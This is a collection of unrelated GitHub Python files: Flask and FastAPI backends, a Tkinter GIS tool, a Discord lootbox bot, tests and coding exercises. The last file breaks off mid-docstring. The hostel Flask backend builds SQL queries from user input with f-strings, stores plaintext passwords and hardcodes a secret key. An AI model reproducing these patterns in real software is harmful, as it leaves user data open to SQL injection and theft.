Aeroporto.query.filter_by(codigo_iata=iata).first_or_404()\n sqlDB.session.delete(aeroporto)\n sqlDB.session.commit()\n return make_response(jsonify(), 204)\n","repo_name":"LuizHnrqB/apiaeroportos","sub_path":"app/controllers/aerporto_controller.py","file_name":"aerporto_controller.py","file_ext":"py","file_size_in_byte":2797,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"13673531652","text":"from __future__ import division\r\nimport sys\r\nimport os\r\n\r\n#Add Module folder to path.\r\n #Module folder contains openpyxl instead of installing it from pip to make it more user friendly\r\nopenpyxl_module = \"Modules\"\r\nmodule_path = os.path.join(os.path.dirname(__file__), openpyxl_module)\r\nsys.path.append(module_path)\r\n\r\nimport openpyxl\r\nimport arcpy\r\n\r\nfrom datetime import datetime\r\n\r\n#Location of user selected Excel file\r\nexcelfile_loc = \"\"\r\n\r\n\r\n#User variables\r\nsheetName = \"Table1\" #Name of the Excel sheet to import\r\nimportTableName = \"Import\" #Name of resulting table after importing the Excel file\r\ngdbFeatureName = \"FeatureClass\" #List of feature class within the GDB to update\r\njoinFieldGDB = \"PrimaryKey_1\" #Name of the field used to join with the Excel Sheet\r\njoinFieldExcel = \"PrimaryKey_2\" #Name of the field used to join with the Feature Class\r\njoinFields = [\"Field_1\", \"Field_2\"] #List of fields to join between the Excel Sheet and the Feature Class\r\n\r\n#Imports the specified excel sheet into the specified file geodatabase\r\ndef importSheet(excel_loc, output_loc, sheet_name):\r\n arcpy.management.Delete(output_loc)\r\n arcpy.ExcelToTable_conversion(excel_loc, output_loc, sheet_name)\r\n\r\n#Runs when user clicks \"Update\" button.\r\n #arcpy.env.workspace is updated to user selected gdb\r\ndef updateFunction():\r\n importSheet(excelfile_loc, importTableName, sheetName)\r\n arcpy.management.JoinField(gdbFeatureName, joinFieldGDB, importTableName, joinFieldExcel, joinFields)\r\n arcpy.management.Delete(importTableName)\r\n pass\r\n \r\n##################################################################################################\r\n#\r\n# GUI Code\r\n#\r\n##################################################################################################\r\n\r\n\r\nfrom Tkinter import *\r\nimport tkFileDialog as filedialog\r\nimport tkMessageBox as messagebox\r\n\r\nroot = Tk()\r\nroot.title(\"Update GDB from Excel\")\r\nscrollbar = Scrollbar(orient=\"horizontal\")\r\nfileentry = Entry(root, xscrollcommand=scrollbar.set, width=100)\r\nfileentry.focus()\r\nfileentry.grid(row=0, column=1, sticky=\"w\")\r\nscrollbar.grid(row=1, column=1, ipadx=275, sticky=\"w\")\r\nscrollbar.config(command=fileentry.xview)\r\nfileentry.config()\r\n\r\ndef selectexcel():\r\n x = filedialog.askopenfilename(title=\"Select File\")\r\n datafile = x\r\n fileentry.delete('0', END)\r\n fileentry.insert(END, datafile)\r\n\r\ndataselect = Button(root, text=\"Select Excel Sheet\", padx=50, command=selectexcel)\r\ndataselect.grid(row=0, column=0)\r\n\r\n\r\nscrollbar2 = Scrollbar(orient=\"horizontal\")\r\nfoldentry = Entry(root, xscrollcommand=scrollbar2.set, width=100)\r\nfoldentry.focus()\r\nfoldentry.grid(row=2, column=1, sticky=\"w\")\r\nscrollbar2.grid(row=3, column=1, ipadx=275, sticky=\"w\")\r\nscrollbar2.config(command=fileentry.xview)\r\nfoldentry.config()\r\n\r\ndef selectgdb():\r\n x = filedialog.askdirectory(title=\"Select GDB\")\r\n datafile = x\r\n foldentry.delete('0', END)\r\n foldentry.insert(END, datafile)\r\n\r\ndataselect = Button(root, text=\"Select GDB folder\", padx=50, command=selectgdb)\r\ndataselect.grid(row=2, column=0)\r\n\r\ndef mainrun():\r\n global excelfile_loc\r\n global output_loc\r\n arcpy.env.workspace = foldentry.get()\r\n excelfile_loc = fileentry.get()\r\n updateFunction()\r\n messagebox.showinfo(\"Completed\", \"GDB has been updated!\")\r\n \r\n\r\nrunbutton = Button(root, text=\"Update\", command=mainrun)\r\nrunbutton.grid(row=4, column=0, ipadx=50, sticky=\"w\")\r\n\r\nroot.mainloop()\r\n\r\n","repo_name":"chowe123/GDB-Update-GUI","sub_path":"GDB Template.py","file_name":"GDB Template.py","file_ext":"py","file_size_in_byte":3471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"37724598291","text":"from settings import *\r\n\r\nclass Bullet(pg.sprite.Sprite):\r\n\r\n def __init__(self,angle,ppos):\r\n pg.sprite.Sprite.__init__(self)\r\n\r\n\r\n self.og = pg.image.load('Bullet.png')\r\n self.og = pg.transform.scale(self.og,(50,20))\r\n self.ogr = self.og.get_rect(center = ppos)\r\n self.image = pg.transform.rotate(self.og,angle)\r\n self.rect = self.image.get_rect(center = self.ogr.center)\r\n self.speed = 20 #speed of the bullet\r\n self.vel = [self.speed*cos(radians(angle)),self.speed*sin(radians(angle*-1))]#Velocity\r\n self.mask = pg.mask.from_surface(self.image)\r\n\r\n def update(self):\r\n \r\n self.rect.move_ip(self.vel)\r\n\r\n if self.rect.right < 0:\r\n self.kill()","repo_name":"zirolet/Portfolio","sub_path":"Python/Pygame/Shooter/Bullet.py","file_name":"Bullet.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"40035725171","text":"from CRUD import fetcher,insertor,user_search\nfrom connect import connector\nfrom flask_cors import CORS\nimport json \nfrom flask import Flask , request, jsonify ,session\nfrom datetime import datetime\nfrom list_dict import convert_to_dict_list\napp = Flask(__name__)\napp.secret_key = 'super secret key'\nCORS(app)\n# conn=None\n\n# global conn \n# just checking\n\nconn,_=connector()\n\n@app.route('/',methods=['POST','GET'])\ndef home():\n \n return \"flask home\"\n\n# @app.route('/list',methods=['POST','GET'])\n# def list():\n# global conn\n# id=request.json['hostelid']\n# print(type(id))\n# query = f\"SELECT * FROM inmate where inmate_id = '{id}';\"\n# print(query)\n# data=fetcher(conn,query)\n \n return data\n\n@app.route('/userreg' ,methods=['POST','GET'])\ndef reg_user():\n global conn\n conn,_=connector()\n # from post data\n data =request.json\n # print(data)\n \n # print(data['hostelid'],data['password'])\n hostelid =data['hostelid'].upper()\n password =data['password'].upper()\n if hostelid !='' and password !='':\n query1 = f\"SELECT * FROM user_det where inmate_id = '{hostelid}';\"\n data1 =fetcher(conn,query1)\n print(data1)\n if data1 ==[]:\n query = f\"INSERT INTO User_det (inmate_id, password) VALUES ('{hostelid}', '{password}');\"\n query_mess = f\"INSERT INTO mess_out (hostel_id) VALUES ('{hostelid}');\"\n query_dash = f\"INSERT INTO inmate (hostel_id) VALUES ('{hostelid}');\"\n insertor(conn,query)\n insertor(conn,query_mess)\n response_data = {'message': 'Data received successfully', 'status': 200}\n return jsonify(response_data)\n else:\n response_data = {'message': 'User already exits', 'status': 404}\n return jsonify(response_data)\n else:\n response_data = {'message': 'Data not received', 'status': 405 }\n return jsonify(response_data)\n\n\n@app.route('/userlog' ,methods=['POST','GET'])\ndef log_user():\n conn,_=connector()\n data =request.json\n \n hostelid =data['hostelid'].upper()\n password =data['password'].upper()\n if hostelid =='' or password =='':\n response_data = {'message': 'Data not received', 'status': 405 }\n return jsonify(response_data)\n query = f\"SELECT * FROM user_det where inmate_id ='{hostelid}';\"\n\n \n # print(query)\n data =user_search(conn,query)\n print(data)\n \n if data is not None and hostelid == data[0] and password == data[1]:\n response_data = {'key':hostelid,'message': 'User logged in successfully', 'status': 200}\n return jsonify(response_data)\n \n else:\n response_data = {'message': 'Login Unsuccessfull', 'status': 404}\n return jsonify(response_data)\n\n@app.route('/userlogout' )\ndef logout_user():\n uid=session.get('userid', None)\n session.pop('userid', None)\n response_data = {'message': \"log out successfull\", 'status': 200}\n return jsonify(response_data)\n\n@app.route('/dash' ,methods=['GET','POST'])\ndef dash():\n conn,_=connector()\n key =request.json\n id=key['hostelid']\n id=id.upper()\n query = f\"SELECT * FROM inmate where hostel_id = '{id}';\"\n data =fetcher(conn,query)\n \n return data\n\n\n@app.route('/messreq' ,methods=['GET','POST'])\ndef messreq():\n\n # conn,_=connector()\n data =request.json\n print(data['messmode'])\n if data['messmode'] == 'MESSOUT':\n query = f\"SELECT mess_mode FROM mess_out where hostel_id = '{data['hostel_id']}';\"\n fetch_data =fetcher(conn,query)\n print(fetch_data[0][0])\n if fetch_data[0][0]:\n response_data = {'message': 'Mess request already sent', 'status': 410}\n return jsonify(response_data)\n\n query = f\"UPDATE mess_out SET mess_mode = 'true', date = '{data['date']}' WHERE hostel_id = '{data['hostel_id']}';\"\n\n print(\"query\",query)\n insertor(conn,query)\n response_data = {'message': 'Mess request sent successfully', 'status': 200}\n return jsonify(response_data)\n elif data['messmode'] == 'MESSIN':\n query = f\"SELECT date FROM mess_out where hostel_id = '{data['hostel_id']}';\"\n fetch_date =fetcher(conn,query)\n date_object = fetch_date[0][0]\n # #########################################\n mess_out_date = date_object.strftime('%m/%d/%Y')\n mess_in_date=data['date']\n # ##########################################\n mess_out_date_1 = datetime.strptime(mess_out_date, '%m/%d/%Y').date()\n mess_in_date_2 = datetime.strptime(mess_in_date, '%m/%d/%Y').date()\n # #############################################\n print(mess_in_date_2)\n print(mess_out_date_1)\n diff=mess_in_date_2-mess_out_date_1\n print(diff.days)\n number_of_days=diff.days\n # #############################################\n query = f\"UPDATE mess_out SET mess_mode = 'false' WHERE hostel_id = '{data['hostel_id']}';\"\n insertor(conn,query)\n query =f\"insert into mess_out_hist (hostel_id, messout_date,messin_date, days) values ('{data['hostel_id']}','{mess_in_date}','{mess_out_date}',{number_of_days});\"\n insertor(conn,query)\n\n\n response_data = {'message': 'Mess request sent successfully', 'status': 200}\n return jsonify(response_data)\n data=jsonify(\"data\",\"data\")\n return data\n\n@app.route('/mess_hist' ,methods=['GET','POST'])\ndef mess_hist():\n conn,_=connector()\n data =request.json\n id=data['hostelid']\n query = f\"SELECT * FROM mess_out_hist where hostel_id = '{id}';\"\n data =fetcher(conn,query)\n dict_data=convert_to_dict_list(data)\n \n \n return dict_data\n\nif __name__ == '__main__':\n app.run(debug=True)","repo_name":"ananthu666/HMMS-backend","sub_path":"flask_app.py","file_name":"flask_app.py","file_ext":"py","file_size_in_byte":5742,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"12654548735","text":"import random\nimport time\nfrom azure.iot.device import IoTHubDeviceClient, Message\n\nCONNECTION_STRING = \"YOUR CONNECTION STRING\" \n\ndef output_to_dict(result_path):\n # Parse the result.txt file from the command line call\n with open(result_path) as f:\n begin = False\n EIP_count = 0\n output = []\n for line in f:\n if \"Enter Image Path:\" in line:\n EIP_count += 1\n if begin == True and EIP_count == 1:\n result = line.split(\"\\t\")\n output.append(result[0])\n if \"./img.jpg\" in line:\n begin = True\n \n # Replace the keys with your class names\n count_items = {\"Egg\" : 0,\n \"Milk\" : 0,\n \"Yoghurt\": 0}\n\n # Increment the count of the relevant class for each instance\n for item in output:\n result = item.split(\":\")\n item_type = result[0]\n count_items[item_type] += 1\n\n return count_items\n \ndef iothub_client_init(): \n client = IoTHubDeviceClient.create_from_connection_string(CONNECTION_STRING) \n return client \n \ndef iothub_client_send_telemetry(message): \n client = iothub_client_init() \n print(\"Attempting to Send Messages to Azure IoT\") \n print(\"Sending message: {}\".format(message)) \n client.send_message(message) \n print(\"Message Sent\")\n \nif __name__ == '__main__': \n message = output_to_dict('result.txt')\n iothub_client_send_telemetry(str(message)) \n","repo_name":"supperted825/RPi_SmartInventoryTracker","sub_path":"parseSendData.py","file_name":"parseSendData.py","file_ext":"py","file_size_in_byte":1478,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"29"} +{"seq_id":"25905690646","text":"# file: overwatchdiscordbot.py\n# desc: A bot for the VOIP app discord that simulates opening\n# lootboxes in the PC game Overwatch\n\nimport asyncio\nfrom datetime import datetime\nimport discord\nfrom discord.ext import commands\nimport json\nfrom pprint import pprint\nimport random\n\n# File containing the bot's secret token\ntoken_filename = \"tokens\\\\token.dat\"\n\n# The bot will only react to command messages that are prefaced by this\ncommand_prefix = \"!\"\n\n# Description of the bot\ndescription = \"Discord bot that simulates opening lootboxes\"\n\n# File for log output\nlog_filename = \"logs\\\\log_\" + str(datetime.now().date())+ \".dat\"\n\n# Files for items\nepic_filename = \"items\\\\epic.json\"\nrare_filename = \"items\\\\rare.json\"\ncommon_filename = \"items\\\\common.json\"\nlegendary_filename = \"items\\\\legendary.json\"\n\n# Site that hosts the images for us lmao\nimage_host_prefix = \"https://overwatchitemtracker.com/resources\"\n\n# Compounded Lootbox Probabilities in range [0,1]\nprob_common = 0.5820\nprob_rare = 0.8990\nprob_epic = 0.9745\nprob_legend = 1\n\n# Discord emojis that represent rarity\nicon_common = \":grey_exclamation:\"\nicon_rare = \":small_blue_diamond:\"\nicon_epic = \":purple_heart:\"\nicon_legend = \":large_orange_diamond:\"\n\n# Load the items\nlist_epic = json.load(open(epic_filename, \"r\"))[\"items\"]\nlist_rare = json.load(open(rare_filename, \"r\"))[\"items\"]\nlist_common = json.load(open(common_filename, \"r\"))[\"items\"]\nlist_legendary = json.load(open(legendary_filename, \"r\"))[\"items\"]\n\nbot = commands.Bot(command_prefix=command_prefix, description=description)\nlog_file = open(log_filename, \"a\")\n\n# Generate 4 random items representing a lootbox\ndef genItems():\n items = []\n rare_gen = False\n for _ in range(4):\n rarity = genRarity()\n if(not rare_gen and rarity != icon_common):\n rare_gen = True\n if rarity == icon_common:\n item = random.choice(list_common)\n items.append((rarity, item[\"id\"], item[\"url\"]))\n elif rarity == icon_rare:\n item = random.choice(list_rare)\n items.append((rarity, item[\"id\"], item[\"url\"]))\n elif rarity == icon_epic:\n item = random.choice(list_epic)\n items.append((rarity, item[\"id\"], item[\"url\"]))\n else:\n item = random.choice(list_legendary)\n items.append((rarity, item[\"id\"], item[\"url\"])) \n if not rare_gen:\n item = random.choice(list_rare)\n items[random.randint(0,3)] = (icon_rare, item[\"id\"], item[\"url\"])\n return items\n\n# Generate a rarity and return the emoji representing that rarity\ndef genRarity():\n roll = random.random()\n if roll < prob_common:\n return icon_common\n elif roll < prob_rare:\n return icon_rare\n elif roll < prob_epic:\n return icon_epic\n else:\n return icon_legend\n\n# Logs all the bot's interactions to a stream\ndef log(string):\n\t# print(str(datetime.now()) + \" : \" + string)\n print(str(datetime.now()) + \" : \" + string, file = log_file)\n log_file.flush()\n\n# Retrieves the bot's secret token from a file\ndef retrieveToken():\n handle = open(token_filename, \"r\")\n return handle.readline()\n\n# Called after bot.run when bot is ready for commands\n@bot.event\n@asyncio.coroutine\ndef on_ready():\n log(\"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\")\n log(\"Bot starting . . .\")\n log(\"Logged in as: \" + bot.user.name)\n log(\"Client ID: \" + bot.user.id)\n game = discord.Game(name=(\"Type \" + command_prefix + \"info for commands.\"))\n yield from bot.change_presence(game=game, status=discord.Status.online)\n\n# Simulates opening a lootbox\n@bot.command(pass_context=True)\n@asyncio.coroutine\ndef lootbox(ctx):\n author = str(ctx.message.author)\n items = genItems()\n log(author + \" is opening a lootbox.\")\n embed = discord.Embed(color=0x9932cc)\n embed.add_field(name=items[0][0], value= \"[\" + items[0][1] + \"](\" +image_host_prefix + items[0][2] + \")\", inline=True)\n embed.add_field(name=items[1][0], value= \"[\" + items[1][1] + \"](\" +image_host_prefix + items[1][2] + \")\", inline=True)\n embed.add_field(name=\"You opened a lootbox!\", value = \"click the links to view the items you found\", inline=False)\n embed.add_field(name=items[2][0], value= \"[\" + items[2][1] + \"](\" +image_host_prefix + items[2][2] + \")\", inline=True)\n embed.add_field(name=items[3][0], value= \"[\" + items[3][1] + \"](\" +image_host_prefix + items[3][2] + \")\", inline=True)\n yield from bot.reply(\"\", embed=embed)\n\n# Info about the bot\n@bot.command(pass_context=True)\n@asyncio.coroutine\ndef info(ctx):\n author = str(ctx.message.author)\n log(author + \" is requesting info\")\n embed = discord.Embed(title = \"Info\", color=0xffa500, description= \n \"This bot lets you open imaginary Overwatch lootboxes.\\n\"+\n \"Currently the supported only commands are as follows:\\n\\n\"+\n command_prefix + \"info -------- displays this message\\n\"+\n command_prefix + \"lootbox ----- opens a lootbox\\n\\n\"+\n \"Planned features include mass opening, inventory tracking, and keeping a count of the boxes opened for each user\\n\\n\"\n \"Source code located [here](https://github.com/jroscoe5/Overwatch-Lootbox-Simulator) (feel free to clean up my ugly code)\"\n )\n yield from bot.say(embed=embed)\n\nif __name__ == \"__main__\":\n\tprint(\"Logging to: \" + log_filename)\n\tbot.run(retrieveToken())","repo_name":"jroscoe5/Overwatch-Lootbox-Simulator","sub_path":"overwatchdiscordbot.py","file_name":"overwatchdiscordbot.py","file_ext":"py","file_size_in_byte":5471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"39090919237","text":"#!/usr/bin/python3\n\"\"\" Unittests for file_storage and all its attributes and methods\n\"\"\"\nimport json\nfrom models import storage\nfrom models.base_model import BaseModel\nfrom models.engine.file_storage import FileStorage\nimport pep8\nimport os\nfrom os.path import exists\nimport sys\nimport unittest\n\n\nclass TestFileStorage(unittest.TestCase):\n \"\"\" Tests File_Storage Class \"\"\"\n\n def FileStorage(self):\n \"\"\" tests for file_storage \"\"\"\n self.assertTrue(hasattr(FileStorage, \"all\"))\n self.assertTrue(hasattr(FileStorage, \"new\"))\n self.assertTrue(hasattr(FileStorage, \"save\"))\n self.assertTrue(hasattr(FileStorage, \"reload\"))\n self.assertTrue(FileStorage.all.__doc__)\n self.assertTrue(FileStorage.new.__doc__)\n self.assertTrue(FileStorage.save.__doc__)\n self.assertTrue(FileStorage.reload.__doc__)\n\n def test_all(self):\n \"\"\" tests all method of file_storage \"\"\"\n myobj = BaseModel()\n __objects = storage.all()\n\n def test_new(self):\n \"\"\" tests new method of file_storage \"\"\"\n myobj = BaseModel()\n # store myobj into __objects variable by .id using new()\n __objects = storage.new(myobj)\n\n def test_save(self):\n \"\"\" tests save method of file_storage \"\"\"\n __file_path = \"file.json\"\n storage.save()\n # check if file.json file was created by save method\n self.assertTrue(exists(__file_path))\n\n def test_reload(self):\n \"\"\" tests reload method of file_storage \"\"\"\n myobj = BaseModel()\n __objects = storage.all()\n storage.reload()\n __objects_reloaded = storage.all()\n self.assertEqual(__objects, __objects_reloaded)\n","repo_name":"laurendobratz00/AirBnB_clone","sub_path":"tests/test_models/test_engine/test_file_storage.py","file_name":"test_file_storage.py","file_ext":"py","file_size_in_byte":1720,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"18100435066","text":"# Hi, here's your problem today. This problem was recently asked by Microsoft:\n\n#You are given an array of integers. Return the largest product that can be made by multiplying any 3 integers in the array.\n\n#Example:\n\n#[-4, -4, 2, 8] should return 128 as the largest product can be made by multiplying -4 * -4 * 8 = 128.\n\n# okay, so this problem has a little bit of trick that comes with it. Right away, you know you can \n# do this in O(N^3) time. That's pretty simple. Just create three loops and find the greatest multiple\n# great, but not great! Then, I was thinking to myself, since I've been doing so much DP\n# why don't I create a matrix that has all the products of pairs of two numbers from the array\n# then I can loop over this matrix and multiply these numbers by the numbers in the array again...\n# wait that's N^3 as well... okay, let's keep thinking about this matrix, what numbers do I really \n# want to try multiplying when I get to this product. I always want to check multiplying the greatest\n# number and the smallest number in the array of numbers. The reason we check the smallest number\n# is because of negatives. By including negative numbers, we have to take into account that the first\n# two numbers that create a product might become negative, but that number can then be made\n# postive by multiplying a very small (extremly negative) number to that product. So then I thought\n# wait a minute, by using this idea of the matrix, I don't actually need to store all of the products\n# anymore, I can keep the intuition that I'm using a matrix, but when I get the two sums, I check\n# to see if I am using the index that contais the max_i position or the min_i position, I then\n# multiply it through if I'm not using one of those and take the max with my current max product!!!\n\n# we have now decreased the complexity to O(n^2) time and O(1) space!!!! But wait, can we do better...\n\ndef three_num_max_product(nums):\n min_pos = nums.index(min(nums))\n max_pos = nums.index(max(nums))\n max_prod = 0\n\n for i in range(len(nums)):\n for j in range(i+1, len(nums)):\n two_product = nums[i] * nums[j]\n if i is not max_pos and j is not max_pos: # we can inlcude max in the product\n max_prod = max(max_prod, two_product * nums[max_pos])\n if i is not min_pos and j is not min_pos: # we can include the min\n max_prod = max(max_prod, two_product * nums[min_pos])\n\n return max_prod\n\nnums = [-4, -4, 2, 8]\nnums2 = [-1, 10, -100, 5]\nnums3 = [-1, 20, 100, 2, 5, -3, -10]\n\nprint(three_num_max_product(nums))\nprint(three_num_max_product(nums2))\nprint(three_num_max_product(nums3))\n\n# but then wait, let's think about why we just stored the max and the mins of the number\n# when we went through to get the greatest product? When we compute the max product,\n# the max product will be the product of the THREE LARGEST numbers, or the largest number\n# and the TWO SMALLEST numbers. The reason it's the two smallest and not the three smallest\n# is because let's say we have three negative numbers, the product will now also be negative\n# so this doesn't help us at all. But if we take the two smallest, and multiply the number\n# by the largest in the array, then we get the largest product (of course taht being that)\n# the two smallest's product is greatest than the second and third greatest. Okay, so what is\n# the best way to keep track of these? We can use a max heap for the smallest numbers\n# and a min heap for the largest numbers, We then get to a number and check to see if it's \n# less than the greatst of the min numbers, if so, we replaces that number and reheapify.\n# for the min heap, we check to see if the number is greater than the smallest number in the \n# min heap, and we replace and heapify based on that. Okay, great. We can now take the \n# product of the max heap and the largest number in the min heap and then we can max that\n# with the product of the min heap. Let's do that! BTW this will be O(1) space and O(N) time\n# because the heap size does not depend on the input. No matter how big the input grows,\n# the heap size will always be 3 adn 2. If you don't understand that, then look at big O documentation\n\nimport heapq\n\ndef product(arr):\n if len(arr) == 0 or not arr: return 0\n result = arr[0]\n for x in arr[1:]:\n result *= x\n return result\n\n\ndef max_triple_prod(nums):\n smallest_heap = [] # max of the mins (we multiply by negative 1 to allow us to use min heap still)\n largest_heap = [] # mins of the maxs\n\n for num in nums:\n if len(smallest_heap) < 2:\n heapq.heappush(smallest_heap, (-1*num))\n elif smallest_heap[0] < num*-1:\n heapq.heappushpop(smallest_heap, (-1*num))\n \n if len(largest_heap) < 3:\n heapq.heappush(largest_heap, num)\n elif largest_heap[0] < num:\n heapq.heappushpop(largest_heap, num)\n \n return max(product(largest_heap), product(smallest_heap) * max(largest_heap))\n\nprint('second style')\nprint(max_triple_prod(nums))\nprint(max_triple_prod(nums2))\nprint(max_triple_prod(nums3))\n \n\n","repo_name":"Bradysm/daily_coding_problems","sub_path":"largestThreeNumProduct.py","file_name":"largestThreeNumProduct.py","file_ext":"py","file_size_in_byte":5130,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"29"} +{"seq_id":"69854645838","text":"# -*- encoding: utf-8 -*-\n'''\n@File : 剑指 Offer 40. 最小的k个数.py\n@Time : 2022/05/24 17:24:23\n@Author : henfy\n@Diffi : Easy\n@Method : 排序(中等)\n\n题目:https://leetcode.cn/problems/zui-xiao-de-kge-shu-lcof/\n'''\n\n\nfrom typing import List\n\n\nclass Solution:\n def getLeastNumbers(self, arr: List[int], k: int) -> List[int]:\n # arr.sort()\n # # print(arr)\n # return arr[:k]\n\n # 快速排序\n # def quick_sort(arr, l, r):\n # # 子数组长度为 1 时终止递归\n # if l >= r:\n # return\n # # 哨兵划分操作(以 arr[l] 作为基准数)\n # i, j = l, r\n # while i < j:\n # while i < j and arr[j] >= arr[l]:\n # j -= 1\n # while i < j and arr[i] <= arr[l]:\n # i += 1\n # arr[i], arr[j] = arr[j], arr[i]\n # arr[l], arr[i] = arr[i], arr[l]\n # # 递归左(右)子数组执行哨兵划分\n # quick_sort(arr, l, i - 1)\n # quick_sort(arr, i + 1, r)\n\n # quick_sort(arr, 0, len(arr) - 1)\n # return arr[:k]\n\n # 基于快速排序的数组划分\n if k >= len(arr):\n return arr\n\n def quick_sort(l, r):\n i, j = l, r\n while i < j:\n while i < j and arr[j] >= arr[l]:\n j -= 1\n while i < j and arr[i] <= arr[l]:\n i += 1\n arr[i], arr[j] = arr[j], arr[i]\n arr[l], arr[i] = arr[i], arr[l]\n if k < i:\n return quick_sort(l, i - 1)\n if k > i:\n return quick_sort(i + 1, r)\n return arr[:k]\n\n return quick_sort(0, len(arr) - 1)\n\n\nif __name__ == '__main__':\n s = Solution()\n test_list = [\n ([3, 2, 1], 2, [1, 2]),\n ([0, 1, 2, 1], 1, [0]),\n ]\n\n for test_index, test_case in enumerate(test_list, start=1):\n *test, result = test_case\n test_result = s.getLeastNumbers(*test)\n if test_result != result:\n raise ValueError(\"\\n testcase %d error:\\n expect: %s \\n actually %s\" % (\n test_index, result, test_result))\n print(\"test_case %d succeed.\" % test_index)\n","repo_name":"henfy233/leetcode","sub_path":"剑指Offer/剑指 Offer 40. 最小的k个数.py","file_name":"剑指 Offer 40. 最小的k个数.py","file_ext":"py","file_size_in_byte":2311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"82545902","text":"from ..models.BalancedDex import BalancedDex\nfrom fastapi import APIRouter\nfrom pydantic import BaseModel\n\nrouter = APIRouter(prefix=\"/dex\")\n\n# Initialize BalancedDex class.\nbalanced_dex = BalancedDex()\n\n\nclass MarketQuote(BaseModel):\n sicx_icx_quote: str\n sicx_bnusd_quote: str\n baln_bnusd_quote: str\n baln_sicx_quote: str\n\n\n@router.get(\"/quote/\", response_model=MarketQuote)\nasync def get_market_quotes():\n market_quotes = balanced_dex.get_market_quotes()\n sicx_icx_quote = market_quotes[0]\n sicx_bnusd_quote = market_quotes[1]\n baln_bnusd_quote = market_quotes[2]\n baln_sicx_quote = market_quotes[3]\n return {\n \"sicx_icx_quote\": sicx_icx_quote,\n \"sicx_bnusd_quote\": sicx_bnusd_quote,\n \"baln_bnusd_quote\": baln_bnusd_quote,\n \"baln_sicx_quote\": baln_sicx_quote\n }\n","repo_name":"nneessen/balanced-stats-api","sub_path":"app/routers/balanced_dex.py","file_name":"balanced_dex.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"4084281435","text":"#!/usr/bin/env python3\n\nimport json\nimport itertools\nimport ast\nimport argparse\nimport os\nimport pandas as pd\nfrom collections import defaultdict\nimport nltk\nimport string\nimport operator\nimport math\nimport re\n\n#################################################\n#\n# Begin processing\n# Three steps to this. \n#\n#################################################\n\ndef sents_and_weights(d,paragraphs):\n \"\"\"Clean sentences, remove digit, punctuation, upper case to lower\n Args: d,paragraphs = d is article number within file, paragraphs is just paragraphs\n Return: \n labeled sentences: \n stemmed sentences:\n word distribution: \n \"\"\" \n # Create dictionaries for labeled & stemmed sentences to populate\n labeled_sentences = {}\n stemmed_sentences = {}\n\n # Create word distribution dictionaries\n # these needs to be a default dict so it returns 0 if word not found \n word_cts = defaultdict(int)\n word_distr = defaultdict(int)\n\n # initialize for stemming\n stop_words = nltk.corpus.stopwords.words('english')\n stemmer = nltk.stem.PorterStemmer()\n tokenize = nltk.word_tokenize\n sent_splitter = nltk.data.load('tokenizers/punkt/english.pickle')\n\n # helper function for tracking stemmed words\n def stem_and_add(wd):\n word_cts[wd] += 1\n word_cts['total_count'] += 1\n return stemmer.stem(wd)\n\n # need to go through each 'paragraph' (context) to gather info about sentences\n for i,context in enumerate(paragraphs):\n\n paragraph = context['context']\n # split paragraph into sentences, make sure to keep digits, etc. together\n #sentences = context['context'].split('. ') #last one still has a period at the end\n\n #print(len(paragraph))\n\n if len(paragraph) > 75:\n sentences = sent_splitter.tokenize(context['context'].strip())\n else: \n break\n\n # iterate through sentences to tokenize, calculate overall word distribution\n for j,original_sentence in enumerate(sentences):\n\n # Remove all digits\n sentence = ''.join([x for x in original_sentence if not x.isdigit()])\n # Remove all punctuation (OK to include periods since it's been split)\n sentence = ''.join([x for x in sentence if x not in string.punctuation])\n\n # Lowercase everything\n sentence = sentence.strip()\n sentence = sentence.lower()\n\n # Split into words & rejoin (remove extra spaces)\n sentence = ' '.join(sentence.split())\n\n tokenized_stemmed_sent = [stem_and_add(word) for word in nltk.tokenize.word_tokenize(sentence) \n if not word in stop_words]\n\n # keep track of tokenized for calculating sentence weight in next step\n # save list of unprocessed sentences for later\n # but we're only selecting from the first and last sentences in the paragraphs\n if (original_sentence == sentences[0]) | (original_sentence == sentences[-1]):\n if not original_sentence.startswith('[[File:'):\n labeled_sentences[(d,i,j)] = original_sentence.replace('\\n', ' ')\n stemmed_sentences[(d,i,j)] = tokenized_stemmed_sent\n\n # update our word dictionary to be relative frequencies rather than absolute values\n for word, ct in word_cts.items():\n # but keep our total count, we may want that later (not sure)\n if not word == 'total_count':\n word_distr[word] = word_cts[word] / word_cts['total_count']\n \n #print(sorted(word_distr.items(), key=lambda k: k[1], reverse=True))\n return labeled_sentences,stemmed_sentences,word_distr\n \ndef calc_sent_weight(word_dist, stemmed_sents):\n \"\"\"Compute weight with respect to sentences\n Args:\n word_distribution: dict with word: weight\n stemmed_sents: list with \n Return:\n sentence_weight: dict of weight of each sentence. key = sentence #, value = weight\n \"\"\"\n sentences_weight = {}\n # Iterate through each word in each sentence, if word distribution and sentence id are in dictionary, \n # add to existing word distribution. Else, sentence weight for given sentence equals current word distribution\n \n for key, words in stemmed_sents.items():\n #print(words)\n # Sentence weight equals sum of word distributions divided by length of cleaned sentence\n if len(words) == 0:\n weight = 0\n else:\n weight = sum([word_dist[word] for word in words]) / len(words)\n \n sentences_weight[key] = weight\n \n sentences_weight = sorted(sentences_weight.items(), key=operator.itemgetter(1), reverse=True)\n #print('sentence weight: ',sentences_weight)\n\n return sentences_weight\n \ndef topically_important_sentence(sentences_weight, labeled_sentences):\n \"\"\"Select topically import sentences\n Args:\n sentence_weight: list of tuples, (sentence_num, sentence_weight) computed in sentence_weight\n paragraph: set of sentences\n Return:\n sentences_selected: dict, topically important 